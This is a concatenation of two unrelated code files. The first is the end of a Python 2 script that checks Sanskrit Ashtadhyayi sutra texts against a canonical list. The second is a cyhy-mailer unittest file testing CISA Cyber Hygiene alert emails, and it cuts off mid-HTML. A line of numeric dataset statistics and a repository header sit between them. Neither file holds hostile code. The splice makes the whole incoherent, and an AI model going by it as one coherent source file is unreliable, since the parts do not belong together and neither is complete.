प्राच्यभरतेषु","8.3.76:अतिदेशः:स्फुरतिस्फुलत्योर्निर्निविभ्यः","8.3.77:अतिदेशः:वेः स्कभ्नातेर्नित्यम्","8.3.78:अतिदेशः:इणः षीध्वंलुङ्लिटां धोऽङ्गात्","8.3.79:अतिदेशः:विभाषेटः","8.3.80:अतिदेशः:समासेऽङ्गुलेः सङ्गः","8.3.81:अतिदेशः:भीरोः स्थानम्","8.3.82:अतिदेशः:अग्नेः स्तुत्स्तोमसोमाः","8.3.83:अतिदेशः:ज्योतिरायुषः स्तोमः","8.3.84:अतिदेशः:मातृपितृभ्यां स्वसा","8.3.85:अतिदेशः:मातुःपितुर्भ्यामन्यतरस्याम्","8.3.86:अतिदेशः:अभिनिसः स्तनः शब्दसंज्ञायाम्","8.3.87:अतिदेशः:उपसर्गप्रादुर्भ्यामस्तिर्यच्परः","8.3.88:अतिदेशः:सुविनिर्दुर्भ्यः 
सुपिसूतिसमाः","8.3.89:अतिदेशः:निनदीभ्यां स्नातेः कौशले","8.3.90:अतिदेशः:सूत्रं प्रतिष्णातम्","8.3.91:अतिदेशः:कपिष्ठलो गोत्रे","8.3.92:अतिदेशः:प्रष्ठोऽग्रगामिनि","8.3.93:अतिदेशः:वृक्षासनयोर्विष्टरः","8.3.94:अतिदेशः:छन्दोनाम्नि च","8.3.95:अतिदेशः:गवियुधिभ्यां स्थिरः","8.3.96:अतिदेशः:विकुशमिपरिभ्यः स्थलम्","8.3.97:अतिदेशः:अम्बाम्बगोभूमिसव्यापद्वित्रिकुशेकुशङ्क्वङ्गुमञ्जिपुञ्जिपरमेबर्हिर्दिव्यग्निभ्यः स्थः","8.3.98:अतिदेशः:सुषामादिषु च","8.3.99:अतिदेशः:ऐति संज्ञायामगात्","8.3.100:अतिदेशः:नक्षत्राद्वा","8.3.101:अतिदेशः:ह्रस्वात् तादौ तद्धिते","8.3.102:अतिदेशः:निसस्तपतावनासेवने","8.3.103:अतिदेशः:युष्मत्तत्ततक्षुःष्वन्तःपादम्","8.3.104:अतिदेशः:यजुष्येकेषाम्","8.3.105:अतिदेशः:स्तुतस्तोमयोश्छन्दसि","8.3.106:अतिदेशः:पूर्वपदात्","8.3.107:अतिदेशः:सुञः","8.3.108:अतिदेशः:सनोतेरनः","8.3.109:अतिदेशः:सहेः पृतनर्ताभ्यां च","8.3.110:अतिदेशः:न रपरसृपिसृजिस्पृशिस्पृहिसवनादीनाम्","8.3.111:अतिदेशः:सात्पदाद्योः","8.3.112:अतिदेशः:सिचो यङि","8.3.113:अतिदेशः:सेधतेर्गतौ","8.3.114:अतिदेशः:प्रतिस्तब्धनिस्तब्धौ च","8.3.115:अतिदेशः:सोढः","8.3.116:अतिदेशः:स्तम्भुसिवुसहां चङि","8.3.117:अतिदेशः:सुनोतेः स्यसनोः","8.3.118:अतिदेशः:सदिष्वञ्जोः परस्य लिटि","8.3.119:अतिदेशः:निव्यभिभ्योऽड्व्यावये वा छन्दसि","8.4.1:अतिदेशः:रषाभ्यां नो णः समानपदे","8.4.2:अतिदेशः:अट्कुप्वाङ्नुम्व्यवायेऽपि","8.4.3:अतिदेशः:पूर्वपदात् संज्ञायामगः","8.4.4:अतिदेशः:वनं पुरगामिश्रकासिध्रकाशारिकाकोटराऽग्रेभ्यः","8.4.5:अतिदेशः:प्रनिरन्तःशरेक्षुप्लक्षाम्रकार्ष्यखदिरपियूक्षाभ्योऽसंज्ञायामपि","8.4.6:अतिदेशः:विभाषौषधिवनस्पतिभ्यः","8.4.7:अतिदेशः:अह्नोऽदन्तात्","8.4.8:अतिदेशः:वाहनमाहितात्","8.4.9:अतिदेशः:पानं देशे","8.4.10:अतिदेशः:वा भावकरणयोः","8.4.11:अतिदेशः:प्रातिपदिकान्तनुम्विभक्तिषु च","8.4.12:अतिदेशः:एकाजुत्तरपदे णः","8.4.13:अतिदेशः:कुमति च","8.4.14:अतिदेशः:उपसर्गादसमासेऽपि णोपदेशस्य","8.4.15:अतिदेशः:हिनुमीना","8.4.16:अतिदेशः:आनि लोट्","8.4.17:अतिदेशः:नेर्गदनदपतपदघुमास्यतिहन्तियातिवातिद्रातिप्सातिवपतिवहतिशाम्यतिचिनोतिदेग्धिषु च","8.4.18:अतिदेशः:शेषे विभाषाऽकखादावषान्त उपदेशे","8.4.19:अतिदेशः:अनितेः","8.4.20:अतिदेशः:अन्तः","8.4.21:अतिदेशः:उभौ साभ्यासस्य","8.4.22:अतिदेशः:हन्तेरत्पूर्वस्य","8.4.23:अतिदेशः:वमोर्वा","8.4.24:अतिदेशः:अन्तरदेशे","8.4.25:अतिदेशः:अयनं च","8.4.26:अतिदेशः:छन्दस्यृदवग्रहात्","8.4.27:अतिदेशः:नश्च धातुस्थोरुषुभ्यः","8.4.28:अतिदेशः:उपसर्गाद् बहुलम्","8.4.29:अतिदेशः:कृत्यचः","8.4.30:अतिदेशः:णेर्विभाषा","8.4.31:अतिदेशः:हलश्च इजुपधात्","8.4.32:अतिदेशः:इजादेः सनुमः","8.4.33:अतिदेशः:वा निंसनिक्षनिन्दाम्","8.4.34:अतिदेशः:न भाभूपूकमिगमिप्यायीवेपाम्","8.4.35:अतिदेशः:षात् पदान्तात्","8.4.36:अतिदेशः:नशेः षान्तस्य","8.4.37:अतिदेशः:पदान्तस्य","8.4.38:अतिदेशः:पदव्यवायेऽपि","8.4.39:अतिदेशः:क्षुभ्नाऽऽदिषु च","8.4.40:अतिदेशः:स्तोः श्चुना श्चुः","8.4.41:अतिदेशः:ष्टुना ष्टुः","8.4.42:अतिदेशः:न पदान्ताट्टोरनाम्","8.4.43:अतिदेशः:तोः षि","8.4.44:अतिदेशः:शात्","8.4.45:अतिदेशः:यरोऽनुनासिकेऽनुनासिको वा","8.4.46:अतिदेशः:अचो रहाभ्यां द्वे","8.4.47:अतिदेशः:अनचि च","8.4.48:अतिदेशः:नादिन्याक्रोशे पुत्रस्य","8.4.49:अतिदेशः:शरोऽचि","8.4.50:अतिदेशः:त्रिप्रभृतिषु शाकटायनस्य","8.4.51:अतिदेशः:सर्वत्र शाकल्यस्य","8.4.52:अतिदेशः:दीर्घादाचार्याणाम्","8.4.53:अतिदेशः:झलां जश् झशि","8.4.54:अतिदेशः:अभ्यासे चर्च्च","8.4.55:अतिदेशः:खरि च","8.4.56:अतिदेशः:वाऽवसाने","8.4.57:अतिदेशः:अणोऽप्रगृह्यस्यानुनासिकः","8.4.58:अतिदेशः:अनुस्वारस्य ययि परसवर्णः","8.4.59:अतिदेशः:वा पदान्तस्य","8.4.60:अतिदेशः:तोर्लि","8.4.61:अतिदेशः:उदः स्थास्तम्भोः पूर्वस्य","8.4.62:अतिदेशः:झयो होऽन्यतरस्याम्","8.4.63:अतिदेशः:शश्छोऽटि","8.4.64:अतिदेशः:हलो यमां यमि लोपः","8.4.65:अतिदेशः:झरो झरि सवर्णे","8.4.66:अतिदेशः:उदात्तादनुदात्तस्य स्वरितः","8.4.67:अतिदेशः:नोदात्तस्वरितोदयमगार्ग्यकाश्यपगालवानाम्","8.4.68:अतिदेशः:अ 
अ इति"]
def basedata():
    """Build lookup tables for the Ashtadhyayi sutras held in ASdata."""
    global ASdata
    sutrawise = {}
    sutratextonly = []
    sutrawisespaceless = {}
    sutratextonlyspaceless = []
    for member in ASdata:
        # Each entry has the form "number:category:text" (the category may be empty),
        # e.g. "6.4.1:अधिकारः:अङ्गस्य".
        (a,b,c) = member.split(':')
        orig = c.decode('utf-8')
        c = c.decode('utf-8')
        # Convert the Devanagari text to SLP1 and normalise it for comparison.
        c = transcoder.transcoder_processString(c,'deva','slp1')
        c = c.replace(u'\u200c',u'')  # strip zero-width non-joiner
        c = c.replace(u'\u200d',u'')  # strip zero-width joiner
        c = c.replace(u"'",u"")       # drop avagraha (rendered as an apostrophe in SLP1)
        c = re.sub('[NYRnmM]','M',c)  # collapse all nasals to anusvara
        c = re.sub('cC','C',c)        # treat cch and ch alike
        c = re.sub('-','',c)
        c = c.replace('.','')
        a = a.replace('.','-')  # sutra number "6.4.1" becomes the key "6-4-1"
        sutrawise[a] = orig
        sutratextonly.append(orig)
        sutrawisespaceless[a] = c
        sutratextonlyspaceless.append(c.replace(' ',''))
    return sutrawise, sutratextonly, sutrawisespaceless, sutratextonlyspaceless
sutrawise, sutratextonly, sutrawisespaceless, sutratextonlyspaceless = basedata()
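# Illustrative sketch (added for clarity, not part of the original script): given an
# ASdata entry such as "6.4.1:अधिकारः:अङ्गस्य", the tables built above are expected to
# hold roughly the following (the SLP1 value is approximate, since the normalisation
# rewrites every nasal to M and strips avagraha, hyphens and dots):
#   sutrawise['6-4-1']          -> u'अङ्गस्य'   (original Devanagari text)
#   sutrawisespaceless['6-4-1'] -> u'aMgasya'  (normalised SLP1)
#   sutratextonlyspaceless      -> the same normalised strings with spaces removed,
#                                  used below for membership tests.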
class sutra():
    """One sutra parsed from a line of the form {#n#} sutra-text {@a-b-c@},
    where n appears to be the serial number in the source text and a-b-c the
    Ashtadhyayi number."""
    def __init__(self,line):
        m = re.search(u'{#([0-9]+)#}[ ]*(.*)[ ]*{@([0-9-]+)@}',line)
        self.base = m.group(2).strip()
        # Normalise the sutra text the same way basedata() does, so the two can be compared.
        c = unicode(transcoder.transcoder_processString(self.base,'deva','slp1'))
        c = c.replace(u'\u200c',u'')
        c = c.replace(u'\u200d',u'')
        c = re.sub('[NYRnmM]','M',c)
        c = re.sub('cC','C',c)
        c = re.sub('-','',c)
        c = c.replace('.','')
        self.text = c
        self.num = m.group(3)  # Ashtadhyayi number, e.g. "1-1-1"
        self.sk = m.group(1)   # serial number from the source text
        self.textspaceless = self.text.replace(' ','')
def maketest(line):
    """Print any line whose sutra text does not match a canonical Ashtadhyayi reading."""
    global sutratextonlyspaceless, sutrawise
    if re.search(u'{#([0-9]+)#}(.*){@([0-9-]+)@}',line):
        sutradata = sutra(line)
        #print sutradata.num, sutradata.text.encode('utf-8')
        """
        linestripped = re.sub(u'{#([0-9]+)#}(.*){@([0-9-]+)@}',u'\g<2>',line)
        #linestripped = linestripped.replace(' ','')
        linestripped = linestripped.encode('utf-8')
        linestripped = linestripped.strip()
        print linestripped
        """
        if sutradata.textspaceless.replace(u"'","") in sutratextonlyspaceless:
            pass
        elif sutradata.textspaceless not in sutratextonlyspaceless:
            # The text matches no canonical sutra: print the source line,
            # followed by the stored reading for its Ashtadhyayi number.
            #print '; '+sutradata.sk+' '+sutradata.text.encode('utf-8')+' '+sutradata.num.encode('utf-8')
            print '; '+line.strip().encode('utf-8')
            if sutradata.num in sutrawise:
                print transcoder.transcoder_processString(sutrawise[sutradata.num],'slp1','deva').encode('utf-8')
            else:
                print ''

data = codecs.open('../sk1.txt','r','utf-8')
for line in data:
    maketest(line)
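# Illustrative sketch (assumption, not from the original sources): judging by the
# regex in maketest(), each line of ../sk1.txt is expected to wrap a sutra in two
# markers, a serial number in {#...#} and an Ashtadhyayi number in {@...@}, e.g.
# (with a hypothetical serial number):
#   {#11#} वृद्धिरादैच् {@1-1-1@}
# For any line whose normalised text matches no canonical sutra, maketest() prints
# the line followed by the stored reading for its Ashtadhyayi number.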
| 1,249.356436 | 123,697 | 0.49666 | 73,935 | 126,185 | 1.272767 | 0.032664 | 0.030796 | 0.017247 | 0.022061 | 0.518395 | 0.394986 | 0.309483 | 0.218454 | 0.135087 | 0.088978 | 0 | 0.136615 | 0.028585 | 126,185 | 100 | 123,698 | 1,261.85 | 0.374602 | 0.002053 | 0 | 0.2 | 0 | 29.65 | 0.89075 | 0.418815 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.016667 | 0.05 | null | null | 0.05 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0d4bc802d10f50ee49a3c56f9594678f5e15ada3 | 38,035 | py | Python | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 3 | 2017-12-06T07:45:35.000Z | 2018-06-25T20:08:09.000Z | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 33 | 2017-12-11T16:07:04.000Z | 2019-02-25T14:09:45.000Z | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 2 | 2018-03-30T21:46:14.000Z | 2018-07-02T18:01:23.000Z | """This module contains the tests for the CyhyNotificationMessage class."""
# Standard Python Libraries
import unittest
# cisagov Libraries
from cyhy.mailer.CyhyNotificationMessage import CyhyNotificationMessage
class Test(unittest.TestCase):
"""The tests for the CyhyNotificationMessage class."""
    def test_four_params_single_recipient_fed(self):
        """Test the 4-parameter Federal version of the constructor."""
        to = ["recipient@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        agency_acronym = "FEDTEST"
        is_federal = True
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to, pdf, agency_acronym, is_federal, report_date
        )
        self.assertEqual(message["From"], "reports@cyber.dhs.gov")
        self.assertEqual(
            message["Subject"],
            "FEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message.get("CC"), None)
        self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
        self.assertEqual(message["To"], "recipient@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                text_body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), text_body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
                self.assertEqual(part.get_payload(), html_body)
    def test_four_params_multiple_recipients_fed(self):
        """Test the 4-parameter Federal version of the constructor."""
        to = ["recipient@example.com", "recipient2@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        agency_acronym = "FEDTEST"
        is_federal = True
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to, pdf, agency_acronym, is_federal, report_date
        )
        self.assertEqual(message["From"], "reports@cyber.dhs.gov")
        self.assertEqual(
            message["Subject"],
            "FEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message.get("CC"), None)
        self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
        self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
                self.assertEqual(part.get_payload(), html_body)
    def test_six_params_single_cc_fed(self):
        """Test the 6-parameter Federal version of the constructor."""
        to = ["recipient@example.com", "recipient2@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        fm = "sender@example.com"
        cc = ["cc@example.com"]
        bcc = ["bcc@example.com"]
        agency_acronym = "FEDTEST"
        is_federal = True
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to,
            pdf,
            agency_acronym,
            is_federal,
            report_date,
            from_addr=fm,
            cc_addrs=cc,
            bcc_addrs=bcc,
        )
        self.assertEqual(message["From"], fm)
        self.assertEqual(
            message["Subject"],
            "FEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message["CC"], "cc@example.com")
        self.assertEqual(message["BCC"], "bcc@example.com")
        self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
                self.assertEqual(part.get_payload(), html_body)
    def test_six_params_multiple_cc_fed(self):
        """Test the 6-parameter Federal version of the constructor."""
        to = ["recipient@example.com", "recipient2@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        fm = "sender@example.com"
        cc = ["cc@example.com", "cc2@example.com"]
        bcc = ["bcc@example.com", "bcc2@example.com"]
        agency_acronym = "FEDTEST"
        is_federal = True
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to,
            pdf,
            agency_acronym,
            is_federal,
            report_date,
            from_addr=fm,
            cc_addrs=cc,
            bcc_addrs=bcc,
        )
        self.assertEqual(message["From"], fm)
        self.assertEqual(
            message["Subject"],
            "FEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message["CC"], "cc@example.com,cc2@example.com")
        self.assertEqual(message["BCC"], "bcc@example.com,bcc2@example.com")
        self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
                self.assertEqual(part.get_payload(), html_body)
    def test_four_params_single_recipient_nonfed(self):
        """Test the 4-parameter non-Federal version of the constructor."""
        to = ["recipient@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        agency_acronym = "NONFEDTEST"
        is_federal = False
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to, pdf, agency_acronym, is_federal, report_date
        )
        self.assertEqual(message["From"], "reports@cyber.dhs.gov")
        self.assertEqual(
            message["Subject"],
            "NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message.get("CC"), None)
        self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
        self.assertEqual(message["To"], "recipient@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                text_body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), text_body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
